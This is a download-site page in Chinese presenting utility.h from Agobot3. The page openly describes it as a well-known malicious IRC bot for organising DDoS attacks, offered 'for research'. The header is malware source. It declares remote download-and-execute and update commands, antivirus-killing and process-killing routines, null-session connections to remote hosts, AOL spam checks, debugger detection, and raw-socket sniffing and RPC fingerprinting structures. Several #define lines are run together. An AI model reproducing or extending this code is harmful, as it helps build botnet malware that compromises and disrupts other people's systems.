⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 utility.h.svn-base

📁 很有名的一款用于组织DDoS的恶意机器人程序。仅供研究学习
💻 SVN-BASE
字号:
/*	Agobot3 - a modular IRC bot for Win32 / Linux
	Copyright (C) 2003 Ago

	This program is free software; you can redistribute it and/or
	modify it under the terms of the GNU General Public License
	as published by the Free Software Foundation; either version 2
	of the License, or (at your option) any later version.

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
	GNU General Public License for more details.

	You should have received a copy of the GNU General Public License
	along with this program; if not, write to the Free Software
	Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA. */

#ifndef __UTILITY_H__
#define __UTILITY_H__

#include "cstring.h"
#include "commands.h"
#include "message.h"
#include "ssllib.h"
#include "cthread.h"
#include "sockets.h"

// Raw sockets / sniffing flags

#ifndef IP_HDRINCL
#define IP_HDRINCL			2
#endif

#ifndef SIO_RCVALL
#define SIO_RCVALL			_WSAIOW(IOC_VENDOR,1)
#endif

// Definitions for OS fingerprinting

#define OS_UNKNOWN			0
#define OS_WINNT			1
#define OS_WIN2K			2
#define	OS_WINXP			3

#define FP_RPC				1
#define	FP_PORT5K			2
#define FP_TTL				3

// DCE defines

#define DCE_VERSION_MAJOR	0x05
#define DCE_VERSION_MINOR	0x00

#define DCE_PKT_BIND		0x0B
#define DCE_PKT_BINDACK		0x0C
#define DCE_PKT_BINDNACK	0x0D
#define DCE_PKT_REQUEST		0x00
#define DCE_PKT_FAULT		0x03
#define DCE_PKT_RESPONSE	0x02
#define DCE_PKT_ALTCONT		0x0E
#define DCE_PKT_ALTCONTRESP	0x0F
#define DCE_PKT_BINDRESP	0x10

#define RPC_FLG_FIRST		0x01
#define RPC_FLG_LAST		0x02

#define LINUX_TYPE_UNKNOWN		0#define LINUX_TYPE_DEBIAN		1#define LINUX_TYPE_REDHAT		2#define LINUX_TYPE_SUSE			3#define LINUX_TYPE_SLACKWARE	4#define LINUX_TYPE_MANDRAKE		5#define LINUX_TYPE_YELLOWDOG	6#define LINUX_TYPE_TURBOLINUX	7#define LINUX_TYPE_UNITEDLINUX	8#define LINUX_TYPE_FREEBSD		9typedef struct ip_hdr {
	unsigned char	 h_verlen;
	unsigned char	 tos;
	unsigned short	 total_len;
	unsigned short	 ident;
	unsigned short	 frag_and_flags;
	unsigned char	 ttl;
	unsigned char	 proto;
	unsigned short	 checksum;
	unsigned int	 sourceIP;
	unsigned int	 destIP;
}IPHEADER;

typedef struct tsd_hdr {
	unsigned long	 saddr;
	unsigned long	 daddr;
	char			 mbz;
	char			 ptcl;
	unsigned short	 tcpl;
}PSDHEADER;

typedef struct process_info_s {
	CString			 sProcessName;
	unsigned long	 lProcessPid;
} process_info;

typedef struct tcp_hdr {
	unsigned short	 th_sport;
	unsigned short	 th_dport;
	unsigned int	 th_seq;
	unsigned int	 th_ack;
	unsigned char	 th_lenres;
	unsigned char	 th_flag;
	unsigned short	 th_win;
	unsigned short	 th_sum;
	unsigned short	 th_urp;
}TCPHEADER;

typedef struct xheaders_s {
	bool			 bBroadcast;
	int				 iTTL;
	bool			 bUltrapeer;
} xheaders;

typedef struct message_s {
	char			 szCommand[256];
	char			 szParams[1024];
	char			 szId[65];
	char			 szIntFlags[191];
	int				 iContentLength;
	char			*szContent;
} message;

typedef struct url_s {
	CString			 sProto;	// Protocol	( ftp / http		)
	CString			 sHost;		// Host		( www.somwhere.com	)
	CString			 sUser;		// Username ( bla				)
	CString			 sPassword;	// Password	( bla				)
	int				 iPort;		// Port		( default 80		)
	CString			 sReq;		// Request	( /index.html		)
} url;

typedef struct http_req_s {
	url				 uURL;
	CString			 sMethod;
	CString			 sHTTPVer;
	CString			 sHeaders;
} http_req;

typedef struct speedtest_data_s {
	unsigned long	 lEUSpeed;		// Average speed of 2 EU connections
	unsigned long	 lUSSpeed;		// Average speed of 2 US connections
	unsigned long	 lASIASpeed;	// Average speed of 2 ASIA connections
	unsigned long	 lTotalSpeed;	// Average speed of all connections
} speedtest_data;

class CDownloader : public CCommandHandler
{

public:
	void Init();
	bool HandleCommand(CMessage *pMsg);

	command	m_cmdDownload,		m_cmdUpdate,	m_cmdExecute, m_cmdVisit;
	command	m_cmdDownloadFtp,	m_cmdUpdateFtp,	m_cmdExecuteFtp;
};


class CSpeedTest : public CCommandHandler
{

public:
	void Init();
	bool HandleCommand(CMessage *pMsg);

					 CSpeedTest();
	virtual			~CSpeedTest();

	speedtest_data	 m_speedData;
	bool			 m_bDataSet;
	command	m_cmdSpeedTest;

};



class CRSLControl : public CCommandHandler
{
public:
	void Init();
	bool HandleCommand(CMessage *pMsg);
	
	command	m_cmdReboot, m_cmdShutdown, m_cmdLogoff;
};

class CProcessControl : public CCommandHandler
{
public:
	void Init();
	bool HandleCommand(CMessage *pMsg);
	
	command	m_cmdList, m_cmdKill, m_cmdListSvc, m_cmdKillSvc,
		m_cmdKillPid;
};

class CDownloadHelper : public CThread
{
public:
	CDownloadHelper() { m_szType="CDownloadHelper"; m_bJoin=true; }
	virtual ~CDownloadHelper() { }
	virtual void *Run();

	CString			m_sHost;
	CString			m_sPath;
	CString			m_sUser;
	CString			m_sPass;
	CString			m_sTarget;
	CString			m_sReplyTo;
	bool			m_bExecute;
	bool			m_bUpdate;
	bool			m_bFTP;
	bool			m_bSilent;
	bool			m_bNotice;
	bool			m_bJoin;
};

class CStartupThread : public CThread
{
public:
					 CStartupThread();
	virtual			~CStartupThread();
	virtual void	*Run();

	speedtest_data	 m_speedData;
	bool			 m_bDataSet;
	
	bool			 m_bCanSpamAOL;
	bool			 m_bCanSpamAOLSet;
};


class CCmdExecutor : public CThread
{
public:
	CCmdExecutor() { m_szType="CCmdExecutor"; m_pMsg=NULL; m_bMsgSet=false; }
	virtual ~CCmdExecutor() { }
	virtual void *Run();

	CMessage *Get() { return m_pMsg; }
	void Set(CMessage*, bool bInternal=false);
private:
	CMessage	*m_pMsg;
	CMessage	 m_mMsg;
	bool		 m_bMsgSet;
	bool		 m_bInternal;
};

class CSendFile : public CThread
{
public:
					 CSendFile() { m_szType="CSendFile"; }
	virtual			~CSendFile() { }
	virtual void	*Run();
	CSocket			*m_sClientSocket;
protected:
	sockaddr_in		 m_lAddr;
};

class CSendFileFTP : public CThread
{
public:
					 CSendFileFTP() { m_szType="CSendFileFTP"; }
	virtual			~CSendFileFTP() { }
	virtual void	*Run();
	CSocket			*m_sClientSocket;
protected:
	sockaddr_in		 m_lAddr;
};

void CSendFileAccept(CSocket *sClientSocket);
void CSendFileFTPAccept(CSocket *sClientSocket);

class CIdentD : public CThread
{
public:
					 CIdentD() { m_szType="CIdentD"; }
	virtual			~CIdentD() { }
	virtual void	*Run();
protected:
	CSocket			 m_sListenSocket;
};

#ifdef WIN32

class CService : public CThread
{
public:
	CService();
	virtual ~CService() { }
	virtual void *Run();
};

#endif // WIN32

class CCommandInterval : public CThread
{
public:
	CCommandInterval();
	virtual ~CCommandInterval();
	virtual void *Run();
	int m_iInterval;
	CString m_sCommand;
};

class CDebugDetect
{
public:
	CDebugDetect();
	bool IsDebug();
	bool m_bIsDebug;
};

void gen_unique_id(char *szString, int iLen);
int cpuspeed(void);
CString RndNick(const char *szPrefix);
CString CompleteRandom(void);
bool IsSpace(const char cChar);
bool Exist(const char *filename);
bool IsPrivate(const char *ip);
bool ScanPort(const char *host, const unsigned short port);
bool Execute(const char *filename, const char *params);
bool CreateProc(char *filename, char *params);
#ifdef WIN32
bool WriteFile(const char *filename, int resnum, LPCTSTR lpModuleName);
bool ConnectViaNullSession(const char *remote_host, LPNETRESOURCEW nr);
bool CloseNullSession(const char *remote_host);
#endif // WIN32
bool KillProcess(const char *szProcName);
bool KillPid(unsigned long lPid);
bool KillService(const char *szSvcName);
bool ListProcesses(std::list<process_info> *lProcesses);
bool ListServices(std::list<CString> *lServices);
char* GetFilename(char* szFilename, size_t sBufSize);
unsigned short checksum(unsigned short *buffer, int size);
in_addr &to_in_addr(unsigned long lHost);
void KillAV();
int GetFileSize(FILE *fp);
bool ParseURL(const char *szURL, url *pURL);
bool MemContains(const char *pMem, const int iMemLen, const char *pSearch, const int iSearchLen);
int FpHost(const char *szHost, int iFpType);
bool CanSpamAOL();
bool GetKVersion(char **pszBuf, int iDistro);bool GetVersion(char **pszBuf, int iDistro);int GetDistro();
unsigned long GetSpeed(const char *szHost);
void DoSpeedTest(speedtest_data *pData);
void test();
int isSilent(CString chanName);
void setSilent(CString chanName, int value);
CString GetFreeDiskSpace(void);
bool ServiceDel(CString &sServicename);
void AddHosts();

#endif // __UTILITY_H__

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -